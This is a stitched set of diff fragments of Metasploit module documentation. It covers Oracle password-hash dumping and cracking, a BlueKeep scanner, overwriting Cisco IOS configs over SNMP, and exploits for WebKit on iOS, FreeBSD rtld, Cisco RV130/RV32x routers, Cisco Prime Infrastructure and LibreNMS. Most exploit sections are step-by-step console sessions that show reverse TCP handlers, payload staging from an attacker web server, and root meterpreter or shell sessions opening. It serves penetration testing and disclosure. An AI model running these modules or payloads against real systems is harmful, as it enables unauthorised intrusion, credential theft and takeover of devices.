SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
...
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ -------
... ----- ------------ ----------
127.0.0.1 127.0.0.1 1522/tcp (oracle) SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699 Nonreplayable hash oracle12c
```
These hashes are then saved as credentials so that `jtr_oracle_fast` can crack them (using [John The Ripper "bleeding_jumbo"](https://github.com/magnumripper/JohnTheRipper)).
```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast
msf5 auxiliary(analyze/jtr_oracle_fast) > run
...
[*] Cracking oracle12c hashes in normal wordlist mode...
Using default input encoding: UTF-8
[*] Cracking oracle12c hashes in single mode...
Using default input encoding: UTF-8
[*] Cracked passwords this run:
[+] SCOTT:hunter2
...
```
### Oracle 18c (18.4 XE) on Windows 2012
```
resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
resource (oracle.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (oracle.rb)> set dbuser system
dbuser => system
resource (oracle.rb)> set dbpass oracle
dbpass => oracle
resource (oracle.rb)> set sid XE
sid => XE
resource (oracle.rb)> run
[-] Version 18c is not currently supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Oracle 11g (11.2 XE) on Windows 2012
```
resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
resource (oracle.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (oracle.rb)> set dbuser system
dbuser => system
resource (oracle.rb)> set dbpass oracle
dbpass => oracle
resource (oracle.rb)> set sid XE
sid => XE
msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true
verbose => true
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[*] Server is running version 11g
[*] Hash table :
Oracle Server Hashes
====================
Username Hash
-------- ----
APEX_040000 S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
APEX_PUBLIC_USER S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
APPQOSSYS S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
CTXSYS S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
DBSNMP S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
DIP S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
FLOWS_FILES S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
HR S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
MDSYS S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
ORACLE_OCM S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
OUTLN S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
SYS S:BFAF1ED5A8D39CC10D07DAF03A175C65198359874DAD92F081BE09B89162
SYSTEM S:D88BA08B353EC52E1EFD8433DF623773ACE3F81B7294BBC2E5C22CDD32F5
XDB S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
XS$NULL S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,79 @@
[CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708) ("BlueKeep") may allow an unauthenticated attacker to gain remote code execution on an unpatched Microsoft Windows workstation or server exposing the [Remote Desktop Protocol (RDP)](https://docs.microsoft.com/en-us/windows/desktop/termserv/remote-desktop-protocol). As a result, the vulnerability has the maximum CVSS score of 10.0.
The vulnerability exists and been patched in workstation editions of Windows XP, Windows Vista, and Windows 7. Server releases of Windows are also affected and have been patched: Windows 2003, Windows 2008 and Windows 2008 R2.
This module, `auxiliary/scanner/rdp/cve_2019_0708_bluekeep`, scans all versions of Windows, reporting back the vulnerable state of one or more targets. The vulnerability is not known to exist in versions of Windows 8 (or above) or Windows 2012 (or above). However, the scanner can safely be used against all Windows versions without effect on the RDP service or clients.
## Vulnerable Application
Remote Desktop Protocol (RDP), also known as Terminal Services, allows authenticated users to remotely administer Windows workstations and servers. RDP is common in enterprise networks, as it allows IT administrators and users alike to conveniently work remotely. Additionally, RDP is not uncommon to see exposed to the Internet, sometimes on its default port of TCP/3389.
RDP is supported on Windows platforms from Windows XP through all modern versions of Windows. Newer versions of Windows (XP SP3+, Vista, and up) support Network Level Authentication (NLA), which provides enhanced authentication and mitigates some RDP-based attacks.
## Verification Steps
1. Set up a Windows target (XP, Vista, 7, 2003, 2008, 2008 R2).
2. Start msfconsole.
3. Load the module: `use auxiliary/scanner/rdp/cve_2019_0708_bluekeep`
4. Specify the IP address of one or more targets: `set RHOSTS 192.168.1.1-5`
5. Optionally, change the target port from the default of `3389`: `set RPORT 31337`
6. Launch the scanner: `run`
## Scenarios
#### A vulnerable version and configuration of Microsoft Windows
If the target has RDP accessible with NLP disabled, and is running a vulnerable version of Windows (XP, 7, 2003, 2008, 2008 R2) without a [patch](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708), it will return a Vulnerable status:
```
[+] 192.168.1.2:3389 - The target is vulnerable.
[*] 192.168.1.2:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
#### A patched or NLP-enabled configuration of Microsoft Windows
If the target has RDP accessible, but is not vulnerable for one or more reasons, it may have NLP enabled or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708). In these cases, a patched or NLP-enabled target will return:
```
[*] 192.168.1.3:3389 - The target is not exploitable.
[*] 192.168.1.3:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
#### A non-vulnerable version of Microsoft Windows
If the target has RDP accessible, but is a newer, non-vulnerable version of Windows (8, 10, 2012, 2016), or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708). In these cases, a non-vulnerable target will return:
```
[*] 192.168.1.4:3389 - The target is not exploitable.
[*] 192.168.1.4:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
#### A host without RDP enabled
A non-Windows target, or a Windows target with RDP disabled or firewalled, will report failure to connect:
```
[*] 192.168.220.1:3389 - The target service is not running, or refused our connection.
[*] 192.168.220.1:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Testing
This scanner module has been tested against a variety of Windows hosts, ranging from Windows XP through Windows 2016. During testing, no adverse effects or logging was identified on release builds. (Note: Debug/checked builds exhibited crashes, but these should not be found in production environments.)
Workstation versions:
- Windows XP SP2 (x86), SP3 (x86), Version 2003 (x64)
- Windows Vista SP0 (x86), SP0 (x64), SP2 (x64)
- Windows 7 SP1 (x86), SP1 (x64)
- Windows 10 1709, 1809 (x64)
Server versions:
- Windows 2000 SP4 (x86)
- Windows 2003 SP0 (x86), SP1 (x86), SP1 (x64), SP2 (x86), R2 SP1 (x86), R2 SP2 (x86)
- Windows 2008 SP0 (x64), SP1 (x86), R2 SP1 (x64)
- Windows 2012 R2 (x64)
- Windows 2016 Build 1607 (x64)
### Questions? Issues?
If you encounter issues with the module, consider reaching out to the developers and user community [using Slack](https://www.metasploit.com/slack). If you encounter crashing on any targets, please consider [opening a issue](https://github.com/rapid7/metasploit-framework/issues/new).
@@ -3,18 +3,36 @@
Cisco IOS devices can be configured to retrieve, via tftp, a file via SNMP.
This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
feature of IOS and many other networking devices, and is part of an administrator functionality.
This functionality can also be used to change their running configuration. This is documented [here](https://www.ciscozine.com/send-cisco-commands-via-snmp/).
A read-write community string is required, as well as a tftp server (metasploit includes one).
The file will be saved to `flash:`.
The default functionality of the module will upload the file and it will be saved to `flash:`.
The `Override_Config` action will override the running configuration of the device and the file will not be saved.
## Verification Steps
Upload_File (Default Action)
1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
4. Do: ```set COMMUNITY [read-write snmp]```
5. Do: ```set rhosts [ip]```
6. Do: ```set source [file]```
7. Do: ```run```
5. Do: ```set lhost [your IP address]```
6. Do: ```set rhosts [ip]```
7. Do: ```set source [file]```
8. Do: ```run```
Override_Config
1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
4. Do: ```set COMMUNITY [read-write snmp]```
5. Do: ```set lhost [your IP address]```
6. Do: ```set rhosts [ip]```
7. Do: ```set source [file]```
8. Do: ```set action [Override_Config]```
9. Do: ```run```
10. You can **Verify** that the running config has been overridden by using the **auxiliary/scanner/snmp/cisco_config_tftp** module to download the current running config from the device.
## Options
@@ -47,3 +65,27 @@ msf5 auxiliary(scanner/snmp/cisco_upload_file) > run
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
```
### Cisco 3560G switch running IOS 12.2
```
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private`
`COMMUNITY => private`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164`
`LHOST => 10.20.164.164`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config`
`action => Override_Config`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5`
`rhosts => 10.20.205.5`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig`
`source => /root/Desktop/newconfig`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run`
`[*] Starting TFTP server...`
`[*] Copying file newconfig to 10.20.205.5...`
`[*] Scanned 1 of 1 hosts (100% complete)`
`[*] Providing some time for transfers to complete...`
`[*] Shutting down the TFTP service...`
`[*] Auxiliary module execution completed`
```
@@ -0,0 +1,55 @@
## Description
This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233).
The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution.
The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.
## Vulnerable Application
The exploit should work all 64-bit devices (iPhone 5S and newer) running iOS 10 up to iOS 11.2.
## Verification Steps
* Start msfconsole
* `use exploit/apple_ios/browser/webkit_createthis`
* `set LHOST` and `SRVHOST` as appropriate
* exploit
* Browse to the given URL with a vulnerable device from Safari
* Note that the payload is specially created for this exploit, due to sandbox
limitations that prevent spawning new processes.
## Scenarios
### 64bit iPhone 5S running iOS 10.2.1
```
msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Started reverse TCP handler on 192.168.1.51:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.51:8080/
[*] Server started.
[*] 192.168.1.34 webkit_createthis - Requesting / from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[*] 192.168.1.34 webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[+] 192.168.1.34 webkit_createthis - Sent async_wake exploit
[+] 192.168.1.34 webkit_createthis - Sent sha1 iOS 10 payload
[*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200
msf5 exploit(apple_ios/browser/webkit_createthis) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter aarch64/apple_ios uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34 192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34)
msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1
[*] Starting interaction with 1...
meterpreter > pwd
/System/Library/Frameworks/WebKit.framework/XPCServices/com.apple.WebKit.WebContent.xpc
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
@@ -0,0 +1,149 @@
## Description
This module exploits a vulnerability in the FreeBSD
run-time link-editor (rtld).
The rtld `unsetenv()` function fails to remove `LD_*`
environment variables if `__findenv()` fails.
This can be abused to load arbitrary shared objects using
`LD_PRELOAD`, resulting in privileged code execution.
## Vulnerable Application
This module has been tested successfully on:
* FreeBSD 7.2-RELEASE (amd64)
* FreeBSD 8.0-RELEASE (amd64)
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/freebsd/local/rtld_execl_priv_esc`
4. `set SESSION <SESSION>`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
## Scenarios
### FreeBSD 7.2-RELEASE (amd64)
```
msf5 > use exploit/freebsd/local/rtld_execl_priv_esc
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
session => 1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
verbose => true
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] FreeBSD version 7.2-RELEASE appears vulnerable
[+] gcc is installed
[+] /sbin/ping is setuid
[*] Writing '/tmp/.Qv98Z0.c' (149 bytes) ...
[*] Max line length is 131073
[*] Writing 149 bytes in 1 chunks of 543 bytes (octal-encoded), using printf
[*] Writing '/tmp/.Re1l7JG.c' (413 bytes) ...
[*] Max line length is 131073
[*] Writing 413 bytes in 1 chunks of 1470 bytes (octal-encoded), using printf
[*] Writing '/tmp/.X85bYhTRF' (172 bytes) ...
[*] Max line length is 131073
[*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
[*] [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
[*] [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
[*] [-W waittime] [-z tos] host
[*] ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
[*] [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
[*] [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
[*] [-z tos] mcast-group
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.241:61425) at 2019-05-03 04:34:07 -0400
[+] Deleted /tmp/.Qv98Z0.c
[+] Deleted /tmp/.Qv98Z0.o
[+] Deleted /tmp/.Fv3rwXn.0
[+] Deleted /tmp/.Re1l7JG.c
[+] Deleted /tmp/.Re1l7JG
[+] Deleted /tmp/.X85bYhTRF
id
uid=0(root) gid=0(wheel) groups=0(wheel),1001(user)
uname -a
FreeBSD freebsd-7-2-amd64.local 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May 1 07:18:07 UTC 2009 root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
```
### FreeBSD 8.0-RELEASE (amd64)
```
msf5 > use exploit/freebsd/local/rtld_execl_priv_esc
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
session => 1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
verbose => true
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] FreeBSD version 8.0-RELEASE appears vulnerable
[+] gcc is installed
[+] /sbin/ping is setuid
[*] Writing '/tmp/.ppHMfMh.c' (147 bytes) ...
[*] Max line length is 131073
[*] Writing 147 bytes in 1 chunks of 536 bytes (octal-encoded), using printf
[*] Writing '/tmp/.aSlXLjlX.c' (415 bytes) ...
[*] Max line length is 131073
[*] Writing 415 bytes in 1 chunks of 1476 bytes (octal-encoded), using printf
[*] Writing '/tmp/.9BdfNzy' (172 bytes) ...
[*] Max line length is 131073
[*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] /libexec/ld-elf.so.1: environment corrupt; missing value for
[*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
[*] [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
[*] [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
[*] [-W waittime] [-z tos] host
[*] ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
[*] [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
[*] [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
[*] [-z tos] mcast-group
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.239:57343) at 2019-05-03 04:36:16 -0400
[+] Deleted /tmp/.ppHMfMh.c
[+] Deleted /tmp/.ppHMfMh.o
[+] Deleted /tmp/.VWnmV5K86.0
[+] Deleted /tmp/.aSlXLjlX.c
[+] Deleted /tmp/.aSlXLjlX
[+] Deleted /tmp/.9BdfNzy
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
```
@@ -0,0 +1,27 @@
# Cisco RV130W Routers Management Interface Remote Command Execution
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.
## Vulnerable Device
* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
This exploit was specifically written against version 1.0.3.28. To test, you can find the
firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
## Verification Steps
1. Start msfconsole
2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
3. ```set rhost [IP]```
4. ```set payload linux/armle/meterpreter_reverse_tcp```
5. ```set lhost [IP]```
6. ```exploit```
7. You should get a session
@@ -0,0 +1,148 @@
## Intro
This module automatically exploits two vulnerabilities to create an effectively
unauthenticated remote code execution on RV320 and RV325 routers.
The module will perform the following steps:
First the module will download the configuration. Then it will extract the MD5
password hash for the web interface user. The MD5 password hash is directly
accepted during login instead of the plain text password. With the MD5 hash the
module will authenticate to the web interface of the router and get a valid
authentication cookie.
The second step is using the authentication cookie to
send an authenticated request to the web interface which exploits a command
injection vulnerability. The injection is limited to ~50 characters. Therefore,
the module uses a web server to stage a shell payload for the MIPS64
architecture of the router. Depending on the payload the module will result in
a shell or meterpreter session.
## Vulnerable Application:
Cisco Small Business Routers RV320 and RV325 with firmware versions between
1.4.2.15 and 14.2.20.
Link to vulnerable Firmware Version:
https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20?i=!pp
Links to Advisories:
Part 1 of the exploit (configuration download):
https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export
Part 2 of the exploit (command injection in web interface):
https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection
Advisories by vendor:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
## Options
**RHOSTS**
Configure the remote vulnerable system.
**RPORT**
Configure the TCP port of the HTTP/HTTPS management web interface.
**USE_SSL**
This flag controls whether the remote management web interface is accessible
via HTTPS or not. Should be false for HTTP and true for HTTPS.
**PAYLOAD**
Configure the Metasploit payload that you want to stage. Must be for MIPS64
arch. Set payload Options accordingly.
**SRVHOST**
The module stages the payload via a web server. This is the binding interface
IP. Default can be set to 0.0.0.0.
**HTTPDelay**
This configures how long the module should wait for the incoming HTTP
connection to the HTTP stager.
## Verification Steps:
1. Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
2. Start `msfconsole`:
3. Do: ```use exploit/linux/http/cisco_rv32x_rce```
4. Do: ```set RHOSTS 192.168.1.1```
5. Do: ```set payload linux/mips64/meterpreter_reverse_tcp``` (Set the MIPS64 payload you want to use)
6. Do: ```set LHOST 192.168.1.2``` (Setting your own IP here, example: 192.168.1.2)
7. Do: ```set RPORT 8007``` (Set the remote Port on which the router web interface is accessible)
8. Do: ```run```
9. Gives you a privileged (uid=0) shell or in the example a meterpreter session.
## Scenario
Exploiting a vulnerable RV320 router with publicly accessible HTTPS web
interface on TCP port 443:
```
msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1
msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp
msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2
msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443
msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true
msf5 exploit(linux/http/cisco_rv32x_rce) > run
```
Demo example output for the module:
```
msf5 > use exploit/linux/http/cisco_rv32x_rce
msf5 exploit(linux/http/cisco_rv32x_rce) > show options
Module options (exploit/linux/http/cisco_rv32x_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 15 yes Time that the HTTP Server will wait for the payload request
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8007 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
URIPATH / yes The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)
USE_SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 LINUX MIPS64
msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp
payload => linux/mips64/meterpreter_reverse_tcp
msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443
RPORT => 443
msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true
USE_SSL => true
msf5 exploit(linux/http/cisco_rv32x_rce) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.2:8080/
[*] Server started.
[*] Downloading configuration from 192.168.1.1:443
[*] Using SSL connection to router.
[*] Successfully downloaded config
[*] Got MD5-Hash: dfead10390e560aea745ccba53e044ed
[*] Loging in as user cisco using password hash.
[*] Using default auth_key 1964300002
[*] Successfully logged in as user cisco.
[*] Got cookies: mlap=RGVmYXVsdDE6Ojo6Y2lzY28=;
[*] Sending payload. Staging via http://192.168.1.2:8080/.
[*] 192.168.1.1:443 - Payload request received: /
[*] Waiting for stager connection timed out. Try increasing the delay.
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:48580) at 2019-03-14 10:00:00 +0100
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=99, euid=0, egid=99
```
@@ -0,0 +1,86 @@
## Description
This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability.
## Vulnerable Application
Cisco Prime Infrastructure releases prior to 3.4.1, 3.5, and 3.6, also EPN Manager releases prior to 3.0.1. The Metasploit module is specifically designed to target CPI 3.4.0.
## Notes on Setup
While developing the exploit, I happended to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first.
Special thanks to Steven Seeley (mr_me) for providing some of the most important setup notes himself.
**Hardware Requirements**
There are two machines you want to set up using the same ISO, the first is called the "primary" server, and the other is "secondary" (High Availability) server. They both require the same hardware:
* 4 CPU Cores.
* 12288 MB of RAM (12GB).
* 350GB of hard drive space, but you may still run out of it in days.
* Both VMs should be on the same network.
**SCP**
In case you want to transfer files, you will probably use scp. Before you do that, run the following script as admin on CPI. It will generate the credentials you need to scp files:
```
/opt/CSCOlumos/bin/getSCPcredentials.sh
```
By default, the CPI's SSH server's authentication method is password, you may end up running scp like this:
```
scp -r -o PreferredAuthentications=password admin@ip:/tmp/something.zip .
```
**Out of Space Issues**
Cisco Prime Infrastructure requires a lot of space on the primary server. If it ever reaches to a point where it shuts down unexpectedly, you may not be able to bring the NCS services back again (such as port 80, 443, or 8082). At least for me, I couldn't figure out. If that's the case, you may need to reinstall the VM.
**Unstable HA Connection**
Sometimes the primary and secondary may experience some difficulty staying connected. If this happens, try to do the following on both machines:
1. Run `ncs stop` to stop the services
2. Run `ncs cleanup`
3. Run `ncs start`, this may take 10 to 30 minutes to finish.
4. Finally, run `ncs status` to make sure they are talking.
If the secondary server isn't working with the primary, then the HealthMonitor service may not be in the exploitable condition.
## Verification Steps
1. Start msfconsole
2. Do `use exploit/linux/http/cpi_tararchive_upload`
3. Do `set payload` to select the preferred payload
4. `set rhosts [ip]`
5. `run`, this should give you a shell
## Scenarios
**Running the check**
```
msf5 exploit(linux/http/cpi_tararchive_upload) > check
[*] 192.168.0.23:8082 - The target service is running, but could not be validated.
```
**Exploiting the service**
```
msf5 exploit(linux/http/cpi_tararchive_upload) > run
[*] Started reverse TCP handler on 192.168.0.21:4444
[*] Uploading tar file (3072 bytes)
[*] Executing JSP stager...
[*] Sending stage (985320 bytes) to 192.168.0.23
[*] Meterpreter session 3 opened (192.168.0.21:4444 -> 192.168.0.23:57127) at 2019-06-07 02:50:13 -0500
[!] This exploit may require manual cleanup of '/tmp/UdqUlWsFjp.bin' on the target
[!] This exploit may require manual cleanup of 'apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp' on the target
meterpreter >
[+] Deleted /tmp/UdqUlWsFjp.bin
[+] Deleted apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp
```
@@ -0,0 +1,65 @@
## Description
In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
is passed to the `popen()` function, which results in execution of arbitrary code.
This module has been tested on LibreNMS `v1.46` and `v1.45`.
## Vulnerable Application
A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.
Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
